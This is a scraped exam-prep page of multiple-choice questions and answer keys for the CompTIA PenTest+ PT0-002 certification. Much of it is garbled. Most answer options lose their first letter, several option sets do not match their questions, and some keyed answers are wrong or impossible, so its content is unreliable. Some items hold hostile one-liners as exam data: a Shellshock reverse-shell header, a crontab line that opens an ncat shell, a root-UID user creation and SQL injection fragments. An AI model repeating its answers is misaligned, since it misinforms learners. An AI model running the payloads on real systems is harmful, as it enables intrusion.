DON'T WANT TO MISS A THING?

Certification Exam Passing Tips

Latest exam news and discount info

Curated and up-to-date by our experts

Yes, send me the newsletter

100% Pass Cisco, PMP, CISA, CISM, AWS Practice test on SALE!

Latest CompTIA PenTest+ PT0-002 Exam Questions for Effective Preparation

Our extensive collection of exam questions and answers, carefully crafted test questions, and valuable exam resources are here to support your journey. Prepare with confidence using our comprehensive study materials, designed to cover all key topics tested in the exam. From penetration testing methodologies to vulnerability assessment and management, our resources are tailored to enhance your understanding and boost your exam readiness. Practice makes perfect, and our mock exams are the perfect tool to assess your knowledge and simulate the exam environment. Identify strengths and weaknesses, refine your skills, and approach exam day with confidence. With our expert guidance and top-notch study materials, you'll be well-equipped to pass the CompTIA PenTest+ PT0-002 exam and take your cybersecurity career to new heights. Start preparing today for a successful exam experience!
Take other online exams
Question #1
A penetration tester discovered a vulnerability that provides the ability to upload to a path via discovery traversal. Some of the files that were discovered through this vulnerability are:Which of the following is the BEST method to help an attacker gain internal access to the affected machine?
A. hether sensitive client data is publicly accessible
B. hether the connection between the cloud and the client is secure
C. hether the client's employees are trained properly to use the platform
D. hether the cloud applications were developed using a secure SDLC
View answer
Correct Answer: C
Question #2
A software company has hired a security consultant to assess the security of the company's software development practices. The consultant opts to begin reconnaissance by performing fuzzing on a software binary. Which of the following vulnerabilities is the security consultant MOST likely to identify?
A. eak authentication schemes
B. redentials stored in strings
C. uffer overflows
D. on-optimized resource management
View answer
Correct Answer: C
Question #3
Which of the following types of information would MOST likely be included in an application security assessment report addressed to developers? (Choose two.)
A. ydra
B. ohn the Ripper
C. ain and Abel
D. edusa
View answer
Correct Answer: BC
Question #4
A penetration tester has been given an assignment to attack a series of targets in the 192.168.1.0/24 range, triggering as few alarms and countermeasures as possible. Which of the following Nmap scan syntaxes would BEST accomplish this objective?
A. map ג€"sT ג€"vvv ג€"O 192
B. map ג€"sV 192
C. map ג€"sA ג€"v ג€"O 192
D. map ג€"sS ג€"O 192
View answer
Correct Answer: D
Question #5
A penetration tester is cleaning up and covering tracks at the conclusion of a penetration test. Which of the following should the tester be sure to remove from the system? (Choose two.)
A. Spawned shells
B. Created user accounts
C. Server logs
D. Administrator accounts
E. Reboot system
F. ARP cache
View answer
Correct Answer: BC
Question #6
A mail service company has hired a penetration tester to conduct an enumeration of all user accounts on an SMTP server to identify whether previous staff member accounts are still active. Which of the following commands should be used to accomplish the goal?
A. RFY and EXPN
B. RFY and TURN
C. XPN and TURN
D. CPT TO and VRFY
View answer
Correct Answer: A
Question #7
A penetration tester downloaded a Java application file from a compromised web server and identifies how to invoke it by looking at the following log:Which of the following is the order of steps the penetration tester needs to follow to validate whether the Java application uses encryption over sockets?
A. Run an application vulnerability scan and then identify the TCP ports used by the application
B. Run the application attached to a debugger and then review the application?€?s log
C. Disassemble the binary code and then identify the break points
D. Start a packet capture with Wireshark and then run the application
View answer
Correct Answer: D
Question #8
A penetration tester completed an assessment, removed all artifacts and accounts created during the test, and presented the findings to the client. Which of the following happens NEXT?
A. he penetration tester conducts a retest
B. he penetration tester deletes all scripts from the client machines
C. he client applies patches to the systems
D. he client clears system logs generated during the test
View answer
Correct Answer: C
Question #9
Which of the following situations would require a penetration tester to notify the emergency contact for the engagement?
A. he team exploits a critical server within the organization
B. he team exfiltrates PII or credit card data from the organization
C. he team loses access to the network remotely
D. he team discovers another actor on a system on the network
View answer
Correct Answer: D
Question #10
A penetration tester is explaining the MITRE ATT&CK framework to a company's chief legal counsel.Which of the following would the tester MOST likely describe as a benefit of the framework?
A. nderstanding the tactics of a security intrusion can help disrupt them
B. cripts that are part of the framework can be imported directly into SIEM tools
C. he methodology can be used to estimate the cost of an incident better
D. he framework is static and ensures stability of a security program over time
View answer
Correct Answer: A
Question #11
Which of the following concepts defines the specific set of steps and approaches that are conducted during a penetration test?
A. cope details
B. indings
C. ethodology
D. tatement of work
View answer
Correct Answer: C
Question #12
A penetration tester found the following valid URL while doing a manual assessment of a web application: http://www.example.com/product.php?id=123987.Which of the following automated tools would be best to use NEXT to try to identify a vulnerability in this URL?
A. QLmap
B. essus
C. ikto
D. irBuster
View answer
Correct Answer: A
Question #13
A penetration tester completed a vulnerability scan against a web server and identified a single but severe vulnerability.Which of the following is the BEST way to ensure this is a true positive?
A. un another scanner to compare
B. erform a manual test on the server
C. heck the results on the scanner
D. ook for the vulnerability online
View answer
Correct Answer: B
Question #14
DRAG DROP (Drag and Drop is not supported)During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.INSTRUCTIONSAnalyze the code segments to determine which sections are needed to complete a port scanning script.Drag the appropriate elements into the correct locations to complete the script.If at any time you would like to bring back the initial state of the simulation, please click the Re
A. ee Explanation section for answer
View answer
Correct Answer: A
Question #15
A penetration tester is testing a new version of a mobile application in a sandbox environment. To intercept and decrypt the traffic between the application and the external API, the tester has created a private root CA and issued a certificate from it. Even though the tester installed the root CA into the trusted stone of the smartphone used for the tests, the application shows an error indicating a certificate mismatch and does not connect to the server. Which of the following is theMOST likely reason for
A. CP port 443 is not open on the firewall
B. he API server is using SSL instead of TLS
C. he tester is using an outdated version of the application
D. he application has the API certificate pinned
View answer
Correct Answer: D
Question #16
A private investigation firm is requesting a penetration test to determine the likelihood that attackers can gain access to mobile devices and then exfiltrate data from those devices. Which of the following is a social-engineering method that, if successful, would MOST likely enable both objectives?
A. end an SMS with a spoofed service number including a link to download a malicious application
B. xploit a vulnerability in the MDM and create a new account and device profile
C. erform vishing on the IT help desk to gather a list of approved device IMEIs for masquerading
D. nfest a website that is often used by employees with malware targeted toward x86 architectures
View answer
Correct Answer: A
Question #17
A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds?
A. map
B. cpdump
C. capy
D. ping3
View answer
Correct Answer: C
Question #18
A penetration tester has established an on-path attack position and must now specially craft a DNS query response to be sent back to a target host.Which of the following utilities would BEST support this objective?
A. ocat
B. cpdump
C. capy
D. ig
View answer
Correct Answer: C
Question #19
Which of the following would a company's hunt team be MOST interested in seeing in a final report?
A. xecutive summary
B. ttack TTPs
C. ethodology
D. cope details
View answer
Correct Answer: B
Question #20
A penetration tester who is doing a company-requested assessment would like to send traffic to another system suing double tagging.Which of the following techniques would BEST accomplish this goal?
A. FID cloning
B. FID tagging
C. eta tagging
D. ag nesting
View answer
Correct Answer: D
Question #21
A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the company's employees.Which of the following tools can help the tester achieve this goal?
A. etasploit
B. ydra
C. ET
D. PScan
View answer
Correct Answer: C
Question #22
A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet.Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?
A. PLCs will not act upon commands injected over the network
B. Supervisors and controllers are on a separate virtual network by default
C. Controllers will not validate the origin of commands
D. Supervisory systems will detect a malicious injection of code/commands
View answer
Correct Answer: C
Question #23
A penetration tester writes the following script:Which of the following is the tester performing?
A. earching for service vulnerabilities
B. rying to recover a lost bind shell
C. uilding a reverse shell listening on specified ports
D. canning a network for specific open ports
View answer
Correct Answer: D
Question #24
A penetration tester has been hired to perform a physical penetration test to gain access to a secure room within a client's building. Exterior reconnaissance identifies two entrances, a WiFi guest network, and multiple security cameras connected to the Internet.Which of the following tools or techniques would BEST support additional reconnaissance?
A. ardriving
B. hodan
C. econ-ng
D. ircrack-ng
View answer
Correct Answer: B
Question #25
An Nmap scan shows open ports on web servers and databases. A penetration tester decides to run WPScan and SQLmap to identify vulnerabilities and additional information about those systems.Which of the following is the penetration tester trying to accomplish?
A. ncover potential criminal activity based on the evidence gathered
B. dentify all the vulnerabilities in the environment
C. imit invasiveness based on scope
D. aintain confidentiality of the findings
View answer
Correct Answer: B
Question #26
A company has hired a penetration tester to deploy and set up a rogue access point on the network.Which of the following is the BEST tool to use to accomplish this goal?
A. ireshark
B. ircrack-ng
C. ismet
D. ifite
View answer
Correct Answer: B
Question #27
An Nmap network scan has found five open ports with identified services. Which of the following tools should a penetration tester use NEXT to determine if any vulnerabilities with associated exploits exist on the open ports?
A. penVAS
B. rozer
C. urp Suite
D. WASP ZAP
View answer
Correct Answer: A
Question #28
A penetration tester gains access to a system and establishes persistence, and then run the following commands:Which of the following actions is the tester MOST likely performing?
A. edirecting Bash history to /dev/null
B. aking a copy of the user's Bash history to further enumeration
C. overing tracks by clearing the Bash history
D. aking decoy files on the system to confuse incident responders
View answer
Correct Answer: C
Question #29
A penetration tester writes the following script:Which of the following objectives is the tester attempting to achieve?
A. etermine active hosts on the network
B. et the TTL of ping packets for stealth
C. ill the ARP table of the networked devices
D. can the system on the most used ports
View answer
Correct Answer: A
Question #30
A penetration tester gains access to a system and establishes persistence, and then run the following commands:Which of the following actions is the tester MOST likely performing?
A. edirecting Bash history to /dev/null
B. aking a copy of the user's Bash history to further enumeration
C. overing tracks by clearing the Bash history
D. aking decoy files on the system to confuse incident responders
View answer
Correct Answer: C
Question #31
A penetration tester needs to access a building that is guarded by locked gates, a security team, and cameras. Which of the following is a technique the tester can use to gain access to the IT framework without being detected?
A. ick a lock
B. isable the cameras remotely
C. mpersonate a package delivery worker
D. end a phishing email
View answer
Correct Answer: C
Question #32
After gaining access to a previous system, a penetration tester runs an Nmap scan against a network with the following results:The tester then runs the following command from the previous exploited system, which fails:Which of the following explains the reason why the command failed?
A. ctive scanning
B. ing sweep
C. rotocol reversing
D. acket analysis
View answer
Correct Answer: A
Question #33
A penetration tester is assessing a wireless network. Although monitoring the correct channel and SSID, the tester is unable to capture a handshake between the clients and the AP. Which of the following attacks is the MOST effective to allow the penetration tester to capture a handshake?
A. ey reinstallation
B. eauthentication
C. vil twin
D. eplay
View answer
Correct Answer: B
Question #34
A penetration tester received a 16-bit network block that was scoped for an assessment. During the assessment, the tester realized no hosts were active in the provided block of IPs and reported this to the company. The company then provided an updated block of IPs to the tester. Which of the following would be the most appropriate NEXT step?
A. erminate the contract
B. pdate the ROE with new signatures
C. can the 8-bit block to map additional missed hosts
D. ontinue the assessment
View answer
Correct Answer: B
Question #35
A penetration tester is able to capture the NTLM challenge-response traffic between a client and a server.Which of the following can be done with the pcap to gain access to the server?
A. erform vertical privilege escalation
B. eplay the captured traffic to the server to recreate the session
C. se John the Ripper to crack the password
D. tilize a pass-the-hash attack
View answer
Correct Answer: D
Question #36
Which of the following BEST describe the OWASP Top 10? (Choose two.)
A. he most critical risks of web applications
B. list of all the risks of web applications
C. he risks defined in order of importance
D. web-application security standard
E. risk-governance and compliance framework
F. checklist of Apache vulnerabilities
View answer
Correct Answer: AC
Question #37
A consultant is reviewing the following output after reports of intermittent connectivity issues:Which of the following is MOST likely to be reported by the consultant?
A. device on the network has an IP address in the wrong subnet
B. multicast session was initiated using the wrong multicast group
C. n ARP flooding attack is using the broadcast address to perform DDoS
D. device on the network has poisoned the ARP cache
View answer
Correct Answer: D
Question #38
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code: exploit = {`User-Agent`: `() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1`, `Accept`: `text/html,application/ xhtml+xml,application/xml`}Which of the following edits should the tester make to the script to determine the user context in which the server is being run?
A. xploit = {ג€User-Agentג€: ג€() { ignored;};/bin/bash -i id;whoamiג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€}
B. xploit = {ג€User-Agentג€: ג€() { ignored;};/bin/bash -i>& find / -perm -4000ג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€}
C. xploit = {ג€User-Agentג€: ג€() { ignored;};/bin/sh -i ps -efג€ 0>&1ג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€}
D. xploit = {ג€User-Agentג€: ג€() { ignored;};/bin/bash -i>& /dev/tcp/10
View answer
Correct Answer: A
Question #39
A tester who is performing a penetration test on a website receives the following output:Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/search.php on line 62Which of the following commands can be used to further attack the website?
A. ain access to the target host and implant malware specially crafted for this purpose
B. xploit the local DNS server and add/update the zone records with a spoofed A record
C. se the Scapy utility to overwrite name resolution fields in the DNS query response
D. roxy HTTP connections from the target host to that of the spoofed host
View answer
Correct Answer: D
Question #40
A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively exploited by cybercriminals.Which of the following should the tester do NEXT?
A. each out to the primary point of contact
B. ry to take down the attackers
C. all law enforcement officials immediately
D. ollect the proper evidence and add to the final report
View answer
Correct Answer: A
Question #41
Which of the following is MOST important to include in the final report of a static application-security test that was written with a team of application developers as the intended audience?
A. xecutive summary of the penetration-testing methods used
B. ill of materials including supplies, subcontracts, and costs incurred during assessment
C. uantitative impact assessments given a successful software compromise
D. ode context for instances of unsafe typecasting operations
View answer
Correct Answer: C
Question #42
A penetration tester wrote the following script to be used in one engagement:Which of the following actions will this script perform?
A. erform a new penetration test
B. emediate the findings
C. rovide the list of common vulnerabilities and exposures
D. roaden the scope of the penetration test
View answer
Correct Answer: A
Question #43
When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified.Which of the following character combinations should be used on the first line of the script to accomplish this goal?
A. #
B. $
C. #
D. $
E. !
View answer
Correct Answer: E
Question #44
A penetration tester wants to find hidden information in documents available on the web at a particular domain. Which of the following should the penetration tester use?
A. etcraft
B. entralOps
C. esponder
D. OCA
View answer
Correct Answer: D
Question #45
A compliance-based penetration test is primarily concerned with:
A. btaining PII from the protected network
B. ypassing protection on edge devices
C. etermining the efficacy of a specific set of security standards
D. btaining specific information from the protected network
View answer
Correct Answer: C
Question #46
A company uses a cloud provider with shared network bandwidth to host a web application on dedicated servers. The company's contact with the cloud provider prevents any activities that would interfere with the cloud provider's other customers. When engaging with a penetration-testing company to test the application, which of the following should the company avoid?
A. Crawling the web application?€?s URLs looking for vulnerabilities
B. Fingerprinting all the IP addresses of the application?€?s servers
C. Brute forcing the application?€?s passwords
D. Sending many web requests per second to test DDoS protection
View answer
Correct Answer: D
Question #47
A penetration tester ran a simple Python-based scanner. The following is a snippet of the code:Which of the following BEST describes why this script triggered a `probable port scan` alert in the organization's IDS?
A. ock
B. range(1, 1025) on line 1 populated the portList list in numerical order
C. ine 6 uses socket
D. he remoteSvr variable has neither been type-hinted nor initialized
View answer
Correct Answer: B
Question #48
Which of the following documents must be signed between the penetration tester and the client to govern how any provided information is managed before, during, and after the engagement?
A. SA
B. DA
C. OW
D. OE
View answer
Correct Answer: B
Question #49
A penetration tester runs the unshadow command on a machine.Which of the following tools will the tester most likely use NEXT?
A. ohn the Ripper
B. ydra
C. imikatz
D. ain and Abel
View answer
Correct Answer: A
Question #50
A penetration tester is conducting a penetration test. The tester obtains a root-level shell on a Linux server and discovers the following data in a file named password.txt in the /home/svsacct directory:U3VQZXIkM2NyZXQhCg==Which of the following commands should the tester use NEXT to decode the contents of the file?
A. cho U3VQZXIkM2NyZXQhCg== | base64 ג€"d
B. ar zxvf password
C. ydra ג€"l svsacct ג€"p U3VQZXIkM2NyZXQhCg== ssh://192
D. ohn --wordlist /usr/share/seclists/rockyou
View answer
Correct Answer: A
Question #51
During an engagement, a penetration tester found the following list of strings inside a file:Which of the following is the BEST technique to determine the known plaintext of the strings?
A. ictionary attack
B. ainbow table attack
C. rute-force attack
D. redential-stuffing attack
View answer
Correct Answer: B
Question #52
A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations.Which of the following are considered passive reconnaissance tools? (Choose two.)
A. map -P0 -T0 -sS 192
B. map -sA -sV --host-timeout 60 192
C. map -f --badsum 192
D. map -A -n 192
View answer
Correct Answer: AE
Question #53
A company is concerned that its cloud service provider is not adequately protecting the VMs housing its software development. The VMs are housed in a datacenter, with other companies sharing physical resources. Which of the following attack types is MOST concerning to the company?
A. ata flooding
B. ession riding
C. ybersquatting
D. ide channel
View answer
Correct Answer: D
Question #54
A penetration tester is examining a Class C network to identify active systems quickly. Which of the following commands should the penetration tester use?
A. map -sn 192
B. map -sn 192
C. map -sn 192
D. map -sN 192
View answer
Correct Answer: B
Question #55
Which of the following describes the reason why a penetration tester would run the command sdelete mimikatz. * on a Windows server that the tester compromised?
A. o remove hash-cracking registry entries
B. o remove the tester-created Mimikatz account
C. o remove tools from the server
D. o remove a reverse shell from the system
View answer
Correct Answer: C
Question #56
A penetration tester was able to gain access successfully to a Windows workstation on a mobile client's laptop.Which of the following can be used to ensure the tester is able to maintain access to the system?
A. schtasks /create /sc /ONSTART /tr C:\Temp|WindowsUpdate
B. wmic startup get caption,command
C. crontab -l; echo ?€@reboot sleep 200 && ncat -lvp 4242 -e /bin/bash?€) | crontab 2>/dev/null
D. sudo useradd -ou 0 -g 0 user
View answer
Correct Answer: C
Question #57
Which of the following provides an exploitation suite with payload modules that cover the broadest range of target system types?
A. essus
B. etasploit
C. urp Suite
D. thercap
View answer
Correct Answer: B
Question #58
A company uses a cloud provider with shared network bandwidth to host a web application on dedicated servers. The company's contact with the cloud provider prevents any activities that would interfere with the cloud provider's other customers. When engaging with a penetration-testing company to test the application, which of the following should the company avoid?
A. rawling the web application's URLs looking for vulnerabilities
B. ingerprinting all the IP addresses of the application's servers
C. rute forcing the application's passwords
D. ending many web requests per second to test DDoS protection
View answer
Correct Answer: D
Question #59
Which of the following provides a matrix of common tactics and techniques uses by attackers along with recommended mitigations?
A. IST SP 800-53
B. WASP Top 10
C. ITRE ATT&CK framework
D. TES technical guidelines
View answer
Correct Answer: C
Question #60
A penetration tester is reviewing the following DNS reconnaissance results for comptia.org from dig:...;; ANSWER SECTIONcomptia.org. 3569 IN MX comptia.org-mail.protection.outlook.com. comptia.org. 3569 IN A 3.219.13.186. comptia.org. 3569 IN NS ns1.comptia.org. comptia.org. 3569 IN SOA haven. administrator.comptia.org. comptia.org. 3569 IN MX new.mx0.comptia.org. comptia.org. 3569 IN MX new.mx1.comptia.org.Which of the following potential issues can the penetration tester identify based on this output?
A. t least one of the records is out of scope
B. here is a duplicate MX record
C. he NS record is not within the appropriate domain
D. he SOA records outside the comptia
View answer
Correct Answer: A
Question #61
Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment?
A. hether the cloud service provider allows the penetration tester to test the environment
B. hether the specific cloud services are being used by the application
C. he geographical location where the cloud services are running
D. hether the country where the cloud service is based has any impeding laws
View answer
Correct Answer: A
Question #62
A penetration tester ran an Nmap scan on an Internet-facing network device with the -F option and found a few open ports. To further enumerate, the tester ran another scan using the following command: nmap -O -A -sS -p- 100.100.100.50Nmap returned that all 65,535 ports were filteredWhich of the following MOST likely occurred on the second scan?
A. firewall or IPS blocked the scan
B. he penetration tester used unsupported flags
C. he edge network device was disconnected
D. he scan returned ICMP echo replies
View answer
Correct Answer: A
Question #63
Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment?
A. Whether the cloud service provider allows the penetration tester to test the environment
B. Whether the specific cloud services are being used by the application
C. The geographical location where the cloud services are running
D. Whether the country where the cloud service is based has any impeding laws
View answer
Correct Answer: C
Question #64
An assessor wants to run an Nmap scan as quietly as possible. Which of the following commands will give the LEAST chance of detection?
A. ook for open ports
B. isten for a reverse shell
C. ttempt to flood open ports
D. reate an encrypted tunnel
View answer
Correct Answer: C
Question #65
A penetration tester received a .pcap file to look for credentials to use in an engagement.Which of the following tools should the tester utilize to open and read the .pcap file?
A. map
B. ireshark
C. etasploit
D. etcat
View answer
Correct Answer: B
Question #66
A penetration tester runs a scan against a server and obtains the following output:Which of the following command sequences should the penetration tester try NEXT?
A. tp 192
B. mbclient \\\\\\\\WEB3\\\\IPC$ -I 192
C. crack -u Administrator -P 15worst_passwords
D. url -X TRACE https://192
View answer
Correct Answer: A
Question #67
A penetration tester was able to gather MD5 hashes from a server and crack the hashes easily with rainbow tables.Which of the following should be included as a recommendation in the remediation report?
A. tronger algorithmic requirements
B. ccess controls on the server
C. ncryption on the user passwords
D. patch management program
View answer
Correct Answer: A
Question #68
A penetration tester is evaluating a company's network perimeter. The tester has received limited information about defensive controls or countermeasures, and limited internal knowledge of the testing exists. Which of the following should be the FIRST step to plan the reconnaissance activities?
A. aunch an external scan of netblocks
B. heck WHOIS and netblock records for the company
C. se DNS lookups and dig to determine the external hosts
D. onduct a ping sweep of the company's netblocks
View answer
Correct Answer: B
Question #69
During a penetration test, a tester is able to change values in the URL from example.com/login.php?id=5 to example.com/login.php?id=10 and gain access to a web application. Which of the following vulnerabilities has the penetration tester exploited?
A. Command injection
B. Broken authentication
C. Direct object reference
D. Cross-site scripting
View answer
Correct Answer: B
Question #70
A penetration tester conducts an Nmap scan against a target and receives the following results:Which of the following should the tester use to redirect the scanning tools using TCP port 1080 on the target?
A. essus
B. roxyChains
C. WASP ZAP
D. mpire
View answer
Correct Answer: B
Question #71
Which of the following tools would be MOST useful in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance?
A. Shodan
B. Nmap
C. WebScarab-NG
D. Nessus
View answer
Correct Answer: B
Question #72
A security engineer identified a new server on the network and wants to scan the host to determine if it is running an approved version of Linux and a patched version of Apache. Which of the following commands will accomplish this task?
A. map ג€"f ג€"sV ג€"p80 192
B. map ג€"sS ג€"sL ג€"p80 192
C. map ג€"A ג€"T4 ג€"p80 192
D. map ג€"O ג€"v ג€"p80 192
View answer
Correct Answer: C
Question #73
A penetration tester obtained the following results after scanning a web server using the dirb utility:Which of the following elements is MOST likely to contain useful information for the penetration tester?
A. index
B. about
C. info
D. home
View answer
Correct Answer: B
Question #74
A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration tester to:-Have a full TCP connection-Send a `hello` payload-Wait for a response-Send a string of characters longer than 16 bytesWhich of the following approaches would BEST support the objective?
A. un nmap -Pn -sV --script vuln
B. mploy an OpenVAS simple scan against the TCP port of the host
C. reate a script in the Lua language and use it with NSE
D. erform a credentialed scan with Nessus
View answer
Correct Answer: C
Question #75
PCI DSS requires which of the following as part of the penetration-testing process?
A. he penetration tester must have cybersecurity certifications
B. he network must be segmented
C. nly externally facing systems should be tested
D. he assessment must be performed during non-working hours
View answer
Correct Answer: B
Question #76
Which of the following protocols or technologies would in-transit confidentially protection for emailing the final security assessment report?
A. /MIME
B. TPS
C. NSSEC
D. S2
View answer
Correct Answer: A
Question #77
A consultant just performed a SYN scan of all the open ports on a remote host and now needs to remotely identify the type of services that are running on the host. Which of the following is an active reconnaissance tool that would be BEST to use to accomplish this task?
A. cpdump
B. nort
C. map
D. etstat
E. uzzer
View answer
Correct Answer: C
Question #78
A penetration tester receives the following results from an Nmap scan:Which of the following OSs is the target MOST likely running?
A. entOS
B. rch Linux
C. indows Server
D. buntu
View answer
Correct Answer: C
Question #79
Running a vulnerability scanner on a hybrid network segment that includes general IT servers and industrial control systems:
A. ill reveal vulnerabilities in the Modbus protocol
B. ay cause unintended failures in control systems
C. ay reduce the true positive rate of findings
D. ill create a denial-of-service condition on the IP networks
View answer
Correct Answer: B
Question #80
A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the ymic.exe process call create function. Which of the following OS or filesystem mechanisms is MOST likely to support this objective?
A. lternate data streams
B. owerShell modules
C. P4 steganography
D. rocMon
View answer
Correct Answer: D
Question #81
A company's Chief Executive Officer has created a secondary home office and is concerned that the WiFi service being used is vulnerable to an attack. A penetration tester is hired to test the security of the WiFi's router.Which of the following is MOST vulnerable to a brute-force attack?
A. PS
B. PA2-EAP
C. PA-TKIP
D. PA2-PSK
View answer
Correct Answer: A
Question #82
In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: .Which of the following would be the best action for the tester to take NEXT with this information?
A. reate a custom password dictionary as preparation for password spray testing
B. ecommend using a password manager/vault instead of text files to store passwords securely
C. ecommend configuring password complexity rules in all the systems and applications
D. ocument the unprotected file repository as a finding in the penetration-testing report
View answer
Correct Answer: D
Question #83
A penetration tester logs in as a user in the cloud environment of a company.Which of the following Pacu modules will enable the tester to determine the level of access of the existing user?
A. am_enum_permissions
B. am_prive_sc_scan
C. am_backdoor_assume_role
D. am_bruteforce_permissions
View answer
Correct Answer: A
Question #84
A penetration tester needs to perform a vulnerability scan against a web server. Which of the following tools is the tester MOST likely to choose?
A. map
B. ikto
C. ain and Abel
D. thercap
View answer
Correct Answer: B
Question #85
During a penetration test, the domain names, IP ranges, hosts, and applications are defined in the:
A. script>var adr = '
B.
C. var/www/html/index
D. UNION SELECT 1, DATABASE (), 3 --
View answer
Correct Answer: C

View Answers after Submission

Please submit your email and WhatsApp to get the answers of questions.

Note: Please make sure your email ID and Whatsapp are valid so that you can get the correct exam results.

Email:
Whatsapp/phone number:


Copyright © 2024. Designer by SPOTO Official Website. All Rights Reserved.